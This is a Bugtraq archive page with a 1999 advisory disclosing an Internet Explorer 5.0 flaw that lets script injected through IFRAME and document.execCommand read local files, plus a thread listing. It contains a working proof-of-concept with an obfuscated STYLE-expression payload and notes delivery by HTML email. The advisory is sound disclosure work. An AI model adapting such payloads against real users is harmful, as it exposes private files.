Bugtraq mailing list archives
IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand
From: joro () NAT BG (Georgi Guninski)
Date: Mon, 11 Oct 1999 19:21:09 +0300
IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (suppose Win98 is vulnerable) allows reading local files, text and HTML files from any domain and probably window spoofing (have not tested window spoofing but believe it is possible) It is also possible in some cases to read files behind fiewall. Details: The problem is the combination of IFRAME and document.execCommand. Normally, you cannot use execCommand on an IFRAME from another domain. But if you do: "IFRAME.focus(); document.execCommand" then command will be executed in the IFRAME (some commands do not work in this way, but some do and that is enough). So, we create an IFRAME with SRC="file://c:/test.txt" and inject JavaScript code in it. When the JavaScript code is executed, it is executed in the security context of the IFRAME - the "file:" protocol. The injection is done using the "InsertParagraph" command (guess other commands will do) which sets the ID of the paragraph. But if you place a " in the ID, then a STYLE tag may be inserted also. The JavaScript code is injected using the STYLE tag: STYLE="left:expression(eval(JSCode))" This vulnerability may be exploited using HTML email message or a newsgroup posting. The code is: ---------------------------------------------------------------------------------------- <SCRIPT> alert("Create text file c:\\test.txt and it will be read"); function f() { I1.focus(); document.execCommand("selectAll"); document.execCommand("InsertParagraph",false,">\"STYLE='left:expression(eval(String.fromCharCode(97,61,119,105,110,100,111,119,46,111,112,101,110,40,39,102,105,108,101,58,47,47,99,58,47,116,101,115,116,46,116,120,116,39,41,59,97,108,101,114,116,40,97,46,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,84,101,120,116,41)));'"); } setTimeout('f()',2000); </SCRIPT> <IFRAME ID="I1" SRC="file://c:/test.txt"></IFRAME> ---------------------------------------------------------------------------------------- Workaround: Disable Active Scripting Demonstration is available at http://www.nat.bg/~joro/execcommand.html Regards, Georgi Guninski http://www.nat.bg/~joro
Current thread:
- BUG: Win NT TCP/IP Security filters does not get enforced Stefan Norberg (Oct 08)
- Re: BUG: Win NT TCP/IP Security filters does not get enforced Stefan Norberg (Oct 10)
- Re: BUG: Win NT TCP/IP Security filters does not get enforced David LeBlanc (Oct 12)
- SCO OpenServer 5.0.5 overwrite /etc/shadow Brock Tellier (Oct 11)
- IE 5.0 security vulnerability - reading local (and from any domain, probably window spoofing is possible) files using IFRAME and document.execCommand Georgi Guninski (Oct 11)
- Re: SCO OpenServer 5.0.5 overwrite /etc/shadow Bela Lubkin (Oct 11)
- Re: SCO OpenServer 5.0.5 overwrite /etc/shadow Ralph the Wonder Llama (Oct 12)
- Re: SCO OpenServer 5.0.5 overwrite /etc/shadow Bela Lubkin (Oct 12)
- Xerox DocuColor 4 LP D.O.S Jason Lutz (Oct 13)
- Security of "Virtual Network Computer" Mikael Olsson (Oct 12)
- Re: Security of "Virtual Network Computer" Cameron Simpson (Oct 12)
- Re: Security of "Virtual Network Computer" Dan Foster (Oct 12)
- Re: Security of "Virtual Network Computer" Luca Berra (Oct 13)
- Finjan Alert: WinNT.Infis Trojan by way of Tim Wieneke (Oct 13)
- The old "." problem nblasgen () NICK REFRACT COM (Oct 13)
- Re: BUG: Win NT TCP/IP Security filters does not get enforced Stefan Norberg (Oct 10)